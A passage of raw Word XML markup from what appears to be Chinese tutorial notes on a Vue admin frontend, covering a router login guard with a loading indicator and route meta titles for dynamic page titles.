      <w:r>
        <w:t>import { getToken } from "~/composables/auth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AC6924" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">import { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A77D9" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    toast, showFullLoading, hideFullLoading </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E49DA4" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>} from "~/composables/util"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80864E" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import store from "~/store"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD1D21" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084336B6" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15968EAE" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>router.beforeEach(async (to, from, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC6348" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9923B" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    showFullLoading()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BA970" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41801CE2" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const token = getToken()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0D2DB" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有登录，强制跳转到登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0603B5" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(!token &amp;&amp; to.path != "/login"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9232D" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5748D1" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return next({ path: "/login" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191611A" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214700DB" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF8A64E" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止重复登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D10C285" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(token &amp;&amp; to.path == "/login"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17034D66" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿重复登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCF6CD" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return next({ path: from.path? from.path: "/" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105511E2" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9BC4DF" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DC7A93" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果用户登录了，自动获取用户信息，并存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vuex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095731E5" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(token){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121E585" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await store.dispatch("getinfo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F1C86" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6083D" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3596D18B" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1A2FA" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520636B9" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536E323E" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全局后置钩子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A68F6" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRPr="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1E1A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>router.afterEach((to, from) =&gt; hideFullLoading())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA3E9B" w14:textId="69E9898B" w:rsidR="008C1E1A" w:rsidRPr="00181907" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF6EBA" w14:textId="07250D96" w:rsidR="003C4313" w:rsidRDefault="00253FF8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="702" w:name="_Toc159780132"/>
      <w:r w:rsidRPr="00253FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态页面标题实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="702"/>
    </w:p>
    <w:p w14:paraId="03A7BA5A" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A4CDEF" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517D2F5A" w14:textId="3B78E582" w:rsidR="003C4313" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局路由配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r>
        <w:t>/index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F50D3" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC9755" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A641D7" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538A428" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        component: Index,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE5E36" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>meta:{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417102A0" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            title: "</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E9921" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC55B22" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34460084" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8EA7A2" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/about',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1F056" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        component: About,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362DB7BC" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE6C62" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将匹配所有内容并将其放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `$route.params.pathMatch` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0B135" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B34A3" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/:pathMatch(.*)*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF511F" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        name: 'NotFound',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7C822" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        component: NotFound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25B131" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B93C6" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930C6C7" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F46B4CE" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/login',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36932E0F" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        component: Login,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475ACC84" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>meta:{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164C058" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            title: "</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录页</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133A206" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB808C" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E6E41" w14:textId="73DF3AF5" w:rsidR="003C4313" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5528964B" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111A9D8E" w14:textId="3C1CC506" w:rsidR="003C4313" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>:permission.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B07DB" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706E541A" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D61DB" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>router.beforeEach(async (to, from, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BFE480" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
